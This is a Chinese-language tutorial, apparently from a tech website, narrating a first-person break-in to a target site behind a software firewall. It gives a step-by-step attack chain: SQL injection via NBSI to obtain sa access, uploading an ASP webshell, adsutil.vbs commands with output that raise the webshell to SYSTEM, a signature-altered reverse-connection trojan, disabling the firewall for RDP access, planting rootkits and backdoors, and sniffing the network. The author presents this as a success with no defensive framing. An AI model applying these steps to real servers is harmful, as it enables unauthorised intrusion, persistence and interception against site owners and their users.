實例講解網站防火墻滲透
防火墻幾乎已經是企業網絡比本的防護安全產品了,不管是大小網站都有自己的防火墻設施。但是并不是有了防火墻,就不會遭到黑客入侵。黑客的防火墻滲透對于企業來說也是十分致命的,接下來我們就通過實例分析如何進行防火墻滲透。
目標網站www.111.com
一、踩點
ping www.111.com 發現超時,可以是有防火墻或做了策略。再用superscan掃一下,發現開放的端口有很多個,初步估計是軟件防火墻。
二、注入
從源文件里搜索關鍵字asp,找到了一個注入點。用nbsi注入,發現是sa口令登陸,去加了一個用戶,顯示命令完成。哈哈,看來管理員太粗心了。先上傳一個webshell,上傳了一個老兵的asp木馬,接下來的就是個人習慣了,我平時入侵的習慣是先上傳webshell,然后再把webshell提升為system權限,因為這樣說可以說在入侵之時會非常的方便,我個人覺得這個方法非常好。
三、提升權限
先看哪些特權的:
cscript C:\Inetpub\AdminScripts\adsutil.vbs get /W3SVC/InProcessIsapiApps
得到:
Microsoft (R) Windows 腳本宿主版本 5.1 for Windows
版權所有(C) Microsoft Corporation 1996-1999. All rights reserved.
InProcessIsapiApps : (LIST) (5 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
把把asp.dll加進去:
cscript C:\Inetpub\AdminScripts\adsutil.vbs
set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
"c:\winnt\system32\inetsrv\asp.dll"
然后用asp木馬加個用戶,顯示命令完成。
四、TerminalService
接下來就是開3389了,用net start顯示,發現已開了TS服務,但端口上沒有3389,覺得可能是改端口了,但事實上它們欺騙我的感情。
我用netstat -an察看了一下,發現有3389,再從net start 里發現是對方的防火墻搞的鬼。算了,上傳個木馬吧,上傳了一個改了特征碼的20CN反彈木馬。然后用木馬在GUI下關掉了防火墻,再用3389登陸器登了上去。這里我這樣做是因為我知道管理員一定不會在旁邊,而對于這個時候,比較老道的方法大家可以用fpipe實現端口重定向,或者用httptunnel,和黑防里面說的那樣,不過我試過沒有成功過一次。還有一種工具是despoxy,(TCP tunnel for HTTP Proxies),大家有興趣的話可以去試一下,它可以穿透http代理。
五、簡單后門
1、改了FSO名,這樣是讓我自己享受,這個有system權限的馬兒。
2、放了幾個rootkit和幾個網絡上少見的后臺。
3、我個從是不喜歡多放后臺,覺得很煩。
六、sniffer
TS界面下,down了些嗅探器。先ARPsniffer圖形的看了一下,沒有一臺內網機子。又看了一個外網,整個IP段都是。看來我的運行不錯嘛。打開webdavscan查了一下,只有兩三個IP是網站,而且是很小型的,接下來就沒有什么動力了。
總之防火墻滲透還是成功了。
【編輯推薦】